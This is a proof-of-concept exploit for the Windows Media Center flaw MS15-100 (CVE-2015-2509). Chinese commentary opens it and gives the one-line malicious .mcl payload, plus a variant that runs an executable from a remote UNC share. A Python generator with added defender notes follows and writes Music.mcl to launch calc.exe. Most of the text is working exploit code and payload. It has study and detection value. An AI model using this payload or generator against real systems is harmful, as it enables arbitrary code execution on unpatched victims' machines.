poc: https://www.exploit-db.com/exploits/38151/
<application run="
calc.exe"/> 骄情的老外 就这么一句 还非用这python来装B
可以使用 UNC 路径,但对方点击时会弹出提示,询问是否运行
<application run="
\\192.168.85.143\Share\calc.exe"/>
# Title: MS15-100 Windows Media Center Command Execution
# Date : 11/09/2015
# Author: R-73eN
# Software: Windows Media Center
# Tested : Windows 7 Ultimate
# CVE : 2015-2509
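# Proof-of-concept file generator for the issue named in the header
# (MS15-100 / CVE-2015-2509, Windows Media Center). It writes a Media Center
# link file, Music.mcl, whose only content is one <application run="..."/>
# element; per the advisory title, opening such a file on an unpatched system
# runs the named program.
#
# Defender notes:
#   * Mitigation is the MS15-100 security update; the header lists only
#     Windows 7 Ultimate as tested.
#   * .mcl files arriving by mail or download that contain an
#     `application run=` attribute are a useful thing to flag or quarantine.

# ASCII-art banner. The art lines are raw strings so their backslashes are
# literal characters rather than invalid escape sequences (which newer
# Python 3 releases warn about); the printed text is unchanged.
banner = "".join((
    " ___ __ ____ _ _ \n",
    r" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | " "\n",
    r" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | " "\n",
    r" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ " "\n",
    r" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|" "\n\n",
))
# Single-argument print(...) produces the same output on Python 2 and 3.
print(banner)

# Harmless demonstration value: the Windows calculator.
command = "calc.exe"
# NOTE(review): `command` is concatenated into the attribute without XML
# escaping; that is fine for this constant, but a value containing a double
# quote would produce a malformed element.
evil = '<application run="' + command + '"/>'

# The context manager closes the handle even if the write fails; the original
# open()/close() pair leaked it on error.
with open("Music.mcl", "w") as f:
    f.write(evil)

print("\n[+] Music.mcl generated . . . [+]")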